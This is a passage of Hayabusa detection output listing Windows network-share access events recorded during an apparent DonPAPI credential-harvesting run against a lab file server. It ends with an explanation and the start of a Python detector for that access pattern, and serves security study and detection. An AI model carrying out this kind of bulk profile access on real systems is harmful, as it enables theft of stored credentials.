\\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.198 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.265 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.268 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.270 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.305 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.306 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\baretail - Shortcut.lnk | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.308 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.308 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.323 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.323 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.323 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.323 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
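Every 5140 and 5145 row above is logged at info level, so nothing in a single line is alarming; the signal is only in the aggregate: one logon session (same IP Addr and LID) reading Users\<profile>\Recent and Users\<profile>\Desktop for every profile on the C$ admin share within a fraction of a second, which is the access pattern of a DPAPI-harvesting tool such as the DonPAPI run this sample file is named after. The following Python is an added example, not code from Hayabusa or DonPAPI. It parses a constructed sample of rows in the nine-column CSV layout assumed here (Timestamp, Computer, EventID, Level, MitreAttack, RuleTitle, Details, RulePath, FilePath), splits the pipe-separated Details field, and flags sessions that touch Recent and Desktop under several profiles on a disk admin share inside a short window. The thresholds, the shortened rule and file paths, and the benign jdoe row are assumptions made for the example.

```python
import csv
import io
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample in the nine-column Hayabusa CSV layout assumed here.
# Host, user, source IP, logon ID, timestamps and paths mirror the rows on this
# page; the rule/file paths are shortened placeholders and the final jdoe row
# is invented as a benign contrast. Not copied from any real log file.
SAMPLE_CSV = r"""Timestamp,Computer,EventID,Level,MitreAttack,RuleTitle,Details,RulePath,FilePath
2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,5145_NetworkShareFileAccess.yml,DonPAPI.evtx
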